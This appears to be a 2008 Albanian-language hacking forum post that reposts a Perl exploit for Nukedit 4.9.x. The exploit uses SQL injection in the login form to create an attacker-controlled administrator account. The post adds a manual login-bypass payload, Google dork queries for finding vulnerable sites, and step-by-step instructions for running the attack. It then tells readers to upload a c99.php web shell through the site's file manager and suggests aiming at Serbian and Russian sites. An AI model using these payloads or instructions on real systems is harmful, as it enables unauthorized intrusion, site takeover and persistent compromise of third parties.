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| Titulli: Nukedit 4.9.x Remote Create Admin Exploit Fri Mar 07, 2008 1:38 am | |
| Nukedit 4.9.x Remote Create Admin Exploit Cito: #!/usr/bin/perl############################################## ##############Title: Nukedit 4.9.x Create Admin Exploit ## ##Credit: r3dm0v3 ## http://r3dm0v3.persianblog.ir ## r3dm0v3[4t]yahoo[dot]com ## Tehran - Iran ## ##Download: http://www.nukedit.com/content/Download.asp ##Vulnerables: 4.9.x, prior versions maybe affected. ##Remote: Yes ##Dork: "Powered by Nukedit" ##Fix: Not Available ################################################## ##########use LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];if (substr($host,length($host)-1,1) ne "/"){ $host.="/";}$usrmail = $ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737 e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";&Banner();if (@ARGV < 3) {&Usage();exit(1);}print "[~] Host: $host \n";print "[~] Email/Password: $usrmail/$passwd\n";print "[~] Logging in...\n";$xpl = LWP::UserAgent->new() || die;$cookie_jar = HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$res = $xpl->post($url.'utilities/login.asp',Content => ["redir" => "/nukedit/default.asp","email" => "$usrSQL","password" => "r3dm0v3","savepassword" => "false","submit" => "Login",],);if ($res->content =~ /Object Moved/){ print "[+] Logged in\n";}else{ print "[-] Can not login!\n"; exit();}print "[~] Creating Admin...\n";$res = $xpl->post($url.'utilities/useradmin.asp',Content => ["action" => "addDB","username" => "r3dm0v3","company" => "red move","url" => "http://r3dm0v3.persianblog.ir","address" => "a","county" => "b","zip" => "666","country" => "Iran","phone" => "66666666","fax" => "12345678","email" => "$usrmail","password" => "$passwd","groupid" => "1","submit1" => "Add User >>","IP" => "",],);if ($res->content =~ /Object Moved/){ print "[+] Admin added. Login info:\n". " email: $usrmail\n". " password: $passwd\n";}else{ print "[-] Exploit failed!\n"; print $res->content;}sub Banner{print "################################################# ###########\n". "# Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "# r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir #\n". "################################################# ###########\n";}sub Usage(){print "\n Usage: nukedit.pl <host&path> <email> <password>\n";print " ex. : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";}# milw0rm.com [2008-02-26] | Per te Hapur Ket Exploit duhet te keni Prelin te Instaluar.pra shum thjesht eshte se pari Exploitin qe eshte me nalt e beni copy dhe e qitni ne Notepad dhe e beni sava as psh: hack.pl pra e ruani me nje emer qe doni dhe me mbares .pl pastaj e qitni ne C:/ dhe hym ne Start , Run, dhe CMD dhe shkruajm kshtu: cd\ dhe enter pastaj e shkruajm emrin e exploitit un e morra shembull hack.pl dhe psh kshtu: Kodi: hack.pl emriivebsajtit.com/ emalijot@hotmail.com 123456 dhe pastaj Enternqoft se kemi fat krijohet Admini dhe mund te Logiratesh dhe pastaj eshte ne doren tendeSi te kerkosh ne Google.com:dhe Pastaj merrni nje link dhe veproni si me nalt. Kodi: "Powered by Nukedit" Ose
Kodi: inurl:utilities/login.asp Mir, tash edhe nje metod tjeter pa pl se pritoni ( apo se keni te instaluar )
Kodi: #Title: Nukedit 4.9.x Login Bypass SQL injection # #Discovered By: r3dm0v3 # http://r3dm0v3.persianblog.ir # r3dm0v3( 4t ) yahoo [dot] com # Tehran - Iran # #Download: http://www.nukedit.com/content/Download.asp #Vulnerables: 4.9.x, prior versions maybe vulnerable #Remote: Yes #Dork: "Powered by Nukedit" # inurl:utilities/login.asp #Fix: Not Available #POC: #goto http://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below: #Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x #Password: r3dm0v3 #Click Login and you will get in as an admin. #There some other sql injections in other pages. Kjo edhe me e leht kerkoni njejt ne google.com hini te ndonjera faqe dhe pastaj shkoni Login, nqoft se nuk e ka mund te ja shtojsh psh:
Kodi: http://websajti.com/utilities/login.asp dhe pastaj tek Email: ja jep ket kod psh: Kodi: Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x Password: r3dm0v3 Login dhe Pastaj hini ne admin beni qka te duni veq mos ja prishni dhe diqka nqoft se i hini ndonje websajti mund ta shfytzoni per veti:
Kodi: www.faqja.com/filemanager dhe pastaj aty e uplodon phpmailerin ose c99.php shellin per te ber qka te duni etj. Besoj se keni kuptuar eshte thjesht shum, por ka te hackerume shum po ju hini persdyt ajt me te mira Nqoft se deiqka skeni kuptuar vetem pyetni dhe kqyrni ma shum faqe te Serbve dhe Rusve | |